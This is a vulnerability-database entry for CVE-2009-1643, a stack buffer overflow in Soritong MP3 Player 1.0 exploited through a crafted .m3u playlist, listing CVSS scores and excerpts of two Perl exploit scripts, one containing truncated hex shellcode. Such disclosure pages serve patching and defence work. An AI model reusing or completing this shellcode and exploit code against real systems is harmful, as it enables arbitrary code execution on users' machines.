9.3
CVSSv2

CVE-2009-1643

Published: 15/05/2009 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 940
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in Sorinara Soritong MP3 Player 1.0 allows remote malicious users to execute arbitrary code via a crafted .m3u file.

Vulnerable Product Search on Vulmon Subscribe to Product

sorinara soritong mp3 player 1.0

Exploits

#!/usr/bin/perl # Soritong MP3 Player 10 Seh Overwrite Exploit # wwwsorinaracom/soritong/soritong10exe use strict; use warnings; my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\ ...
#!/usr/bin/perl # by hack4love # hack4love@hotmailcom # Soritong MP3 Player 10 (m3u//UItxt) Universal Local BOF (SEH) ############################################################################### # Original exploit:::wwwmilw0rmcom/exploits/8624 # by Stack ####(m3u file)################################################################# ...